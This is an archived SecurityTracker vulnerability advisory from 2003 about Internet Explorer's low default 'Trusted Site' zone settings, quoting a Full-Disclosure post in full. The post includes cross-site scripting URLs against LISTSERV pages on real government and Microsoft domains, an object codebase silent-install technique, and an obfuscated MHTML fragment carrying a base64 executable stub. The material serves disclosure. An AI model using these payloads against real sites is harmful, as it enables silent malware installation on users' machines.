Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Microsoft Internet Explorer Trusted Domain Default Settings Facilitate Silent Installation of Executables
|
|
SecurityTracker Alert ID: 1008558
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Dec 27 2003
|
Impact: Modification of system information, Modification of user information
|
Description: An exploit method was reported in Microsoft Internet Explorer, illustrating IE's weak default settings for the 'Trusted Site' security
zone. A remote user can create HTML that will cause an arbitrary executable to be silently downloaded to and installed on a target
user's system.
http-equiv reported that a remote user can create HTML that, when loaded by a target user, will trigger the flaw and install arbitrary
code to the target user's system, potentially in an arbitrary security domain.
With the assistance of a cross-site scripting
flaw in a web site designated as a 'trusted site' domain, a remote user can display HTML containing a '<object classid="" codebase="">'
tag to install an executable file within an arbitrary security zone [if a web site in the security zone suffers from cross-site
scripting flaws]. If the site is in the 'Internet' zone, the target user may be prompted for installation, but if the site is in
the 'trusted site' domain, the target user will not be prompted, according to the report.
The executable will reportedly be installed
in the Temporary Internet File directory associated with a trusted zone.
|
Impact: A remote user can cause arbitrary binaries to be silently downloaded and installed on the target user's system.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.microsoft.com/technet/security/ (Links to External Site)
|
Cause: Access control error
|
Underlying OS: Windows (Any)
|
Reported By: "http-equiv@excite.com" <1@malware.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Fri, 26 Dec 2003 17:02:55 -0000
From: "http-equiv@excite.com" <1@malware.com>
Subject: [Full-Disclosure] DANGER ZONE: Internet Explorer
|
Friday, December 26, 2003
Technical 'silent delivery and installation of an executable on a
target computer. No client input other than viewing and web site'.
This may be achieved with the Internet Explorer series of so-
called "browsers", all security settings set to HIGH !
[***premium advertising space: your ad here for a nominal monthly
fee contact sales@malware.com***]
Not so simple:
The current trend is to dismiss, pooh pooh, the never-ending ongoing
[almost daily] discoveries of vulnerabilities in the Internet
Explorer series of browsers. So much so there remains in the account
a balance of several full and complete remote compromises [courtesy
of: Liu Die Yu
http://www.safecenter.net/UMBRELLAWEBV4/DirSvc/security/originality/m
icrosoft_ie/index.html] summarily dismissed as "well the internet is
a big bad place, don't surf to unknown sites, and sites you do know
and trust, place in the Trusted Zone. You'll be fine. 'Trust Us !"".
Oh. Okay:
The so-called "Trusted Site" zone setting in the Internet Explorer
series of browsers, is set to LOW on default [screenshot:
http://www.malware.com/trustus.png 28KB]. What that means
is 'minimal safeguards and prompts are provided...most content is
downloaded and run without prompts'. So who do [can] we trust?
For example, we input into the so-called Trusted Zone, the
manufacturer commonly known as Microsoft Dot Com [screenshot:
http://www.malware.com/havefaith.png 15KB]. In fact this peculiar
method and remedy of participating in the World Wide Web is
recommended by the brains behind the the manufacturer commonly known
as Microsoft Dot Com.
Now what:
There is a small yet critical bug in the mailing list software
called LISTSERV from http://www.lsoft.com/. A trivial yet important
ability to effect the common so-called 'cross site scripting' [see:
http://www.cert.org/advisories/CA-2000-02.html] 'malicious html tag
embedding in client web requests':
Microsoft.com uses the mailing list software called LISTSERV. So do
some 300,000 combined public and local others [Note: These numbers
do not include Intranet servers]. Banks. Governments. Schools etc
[see: http://www.lsoft.com/customer/clientlist.asp].
So:
So what that means is if we 'trust' our government, or trust our
bank or our school or even our software 'manufacturer', we are
advised to place everyone else in the 'restricted zone' and our
trusted sites in the 'trusted zone' where: 'minimal safeguards and
prompts are provided...most content is downloaded and run without
prompts'.
Example:
http://discuss.microsoft.com/SCRIPTS/WA-MSD.EXE?A0=<IMG%
20SRC=javascript:document['write'](location)>&T=malware is in the
zone<object>
http://lists.state.gov/SCRIPTS/WA-USIAINFO.EXE?
A1=<img>ind0312d&L=dosback
http://demo.lsoft.com/Scripts/wa-demo.exe?A1=ind9807&L=demo<img>
What that means is we can install via
<object classid="" codebase=""> any executable file from within the
same domain as we see fit. The same domain in the so-called 'Trusted
Site' zone that is. Be it *.gov. *.microsoft.com, *.edu et cetera.
Technically our codebase cannot point to a remote site outside the
zone as it will be cached in the Temporary Internet File [TIF] and
will prompt for install as that remote site is in the Internet Zone.
However, theoretically we can play havoc within our *.gov and .edu
domains on one another. More importantly, we might very well be
able to write our entire Self-Executing HTML file into all of these
domains:
MIME-Version: 1.0
Content-Location:fi le:///m alware.exe
Content-Transfer-Encoding: base64
TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAAEA+
zBqcgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB5AAA
AngAAAAAAAAAAAAAAAAA=/www.malware.com/ /
<o bjec t CLAS SID="CLSID:5 5 5 5 5 5 5 5 - 5 5 5 5"
code base="mhtml:'+path+'">
In which case the entire package will cached in the TIF under the
disguise of a so-called 'TRUSTED ZONE' !
Don't trust us. Trust them.
[***less than premium advertising space: your ad here for a nominal
monthly fee contact sales@malware.com***]
Happy New Year and be safe out there. It's not what it all seems.
End Call
--
http://www.malware.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|
Go to the Top of This SecurityTracker Archive Page
|
